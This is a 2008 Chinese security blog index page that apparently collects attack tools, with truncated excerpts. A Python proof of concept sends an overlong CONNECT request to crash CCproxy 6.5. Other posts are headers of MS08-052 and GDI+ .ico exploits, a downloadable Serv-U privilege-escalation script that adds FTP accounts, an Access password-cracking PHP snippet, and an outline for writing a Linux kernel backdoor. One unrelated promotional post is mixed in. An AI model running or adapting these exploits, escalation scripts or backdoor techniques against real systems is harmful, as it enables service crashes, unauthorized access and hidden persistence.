CCproxy 6.5 Connect BufferOverflow POC

2008/10/01 15:57 | 鬼仔 | 工具收集 | 消灭0留言

作者:Friddy

#Author:Friddy
#QQ:568623
#Email:[email protected]
import sys
import struct
import socket
from time import sleep
prinf “CCproxy 6.5 Connect BufferOverflow POC\nResult:Crash\n”
buf=(“CONNECT “+”A”*1100+”:443 HTTP/1.0\n”
“User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; http://bsalsa.com) ; .NET CLR 2.0.50727)\n”
“Host: www.friddy.cn\n”
“Content-Length: 0\n”
“Proxy-Connection: Keep-Alive\n”
“Pragma: no-cache\x0d\x0a\x0d\x0a”)
阅读全文 »

Tags: ,

Beat the google search

2008/10/01 15:53 | 鬼仔 | 技术文章 | 消灭0留言

前段时间发过一个另外一个绕过的方法(defeating google dork limit ),但是有同学反应失效了,现在有了新的方法。
TR用这个方法弄了个页面放他blog上,我也弄了个放在我blog上,唯一的区别就是TR的是黑色的,节能型,我的是白色的,浪费型。

我的:http://huaidan.org/tools/google.html
TR的:http://www.pcsec.org/google.html

来源:Web安全手册

Beat the google search
阅读全文 »

Tags: ,

su提权通杀asp脚本

2008/10/01 14:39 | 鬼仔 | 工具收集 | 才 1 条评论

鬼仔注:备用地址

文章作者:xiaok[J.L.S.T]
信息来源:安全叶子技术小组[J.Leaves Security Team](http://00day.cn)

一直通杀到su7~~(这句是落叶说的,我可米说…….)

用来加ftp帐号的……本来想多玩会的.死J8头.

Download: https://dl.getdropbox.com/u/216079/servu[Lake2].rar

Tags: ,

MS Internet Explorer GDI+ Proof of Concept (MS08-052)

2008/09/29 14:14 | 鬼仔 | 工具收集 | 5 条评论了已经

<html>
<head>
<STYLE>
ef\:* { behavior: url(#default#VML); }
</STYLE>
</head>

<body>

<pre>
================================================
MS08-052: GDI+ Vulnerability
————————————————
Operating System: XP SP2
Internet Explorer Version: 6.0.2900.2180
Gdiplus.dll Version: 5.1.3102.2180
阅读全文 »

Tags: , ,

MS Windows GDI+ (.ico File) Remote Division By Zero Exploit

2008/09/29 14:12 | 鬼仔 | 工具收集 | 消灭0留言

MS Windows GDI+ .ico Remote Division By Zero

Application: GDIPLUS.DLL

Web Site: http://www.microsoft.com/

Platform: Windows *

Bug: Division By Zero

Tested agains: XP SP3 fully patched

Note: This have nothing to do with http://milw0rm.com/exploits/4044
——————————————————-
阅读全文 »

Tags: , ,

Access在线解密[PHP源码]

2008/09/28 19:29 | 鬼仔 | 工具收集 | 4 条评论了已经

作者:7jdg
来源:t00ls.net
只能解密2000或者97的MDB文件,本来要在CHA88用的.放这来吧..

<?
/*site:http://www.t00ls.net  */
/*如果转载请保留本信息  */
/*by:7jdg      QQ:7259561 */
$file=$_FILES['uploadfile']['tmp_name'];
$oldname =$_FILES['uploadfile']['name'];
$ext     =strtolower(substr(strrchr($oldname, '.'), 1));
if ($file)
{
 阅读全文 »
Tags: ,

惠普英特尔全程助力专家讲堂

2008/09/28 13:50 | 鬼仔 | 乱七八糟 | 3 条评论了已经

平时看到各种东西(不只IT设备),都是说原价多少多少,打折后多少多少,总感觉就是把原价提高了,然后再弄个打折价出来,让你觉得是得到了优惠。至于赠送之类的,就觉得是羊毛出在羊身上。

特别是在IT设备市场,这种现象就更多了,现在每年各家厂商都会针对中小企业推出打折、赠送等优惠活动,因为在竞争异常激烈的IT设备市场,除个人用户以外企业用户也是很重要的一个市场,特别是针对中小型企业的IT设备市场,但是当所有的厂商都利用相同的方式来进行推广产品、进行促销的时候,大家都对这种方式习以为常,反而感觉不到有什么优惠的地方。
阅读全文 »

Tags: ,

抒写Linux 2.6.x下内核级后门程序

2008/09/27 22:51 | 鬼仔 | 技术文章 | 消灭0留言

Author: wzt
EMail: [email protected]
Site: http://www.xsec.org & hhtp://hi.baidu.com/wzt85
Date: 2008-8-29

一. 内核后门简介
二. 内核中系统调用
三. 使用kernel mode socket函数
四. 如何扩展后门
五. 参考资料
六. 相关源代码
阅读全文 »

Tags: ,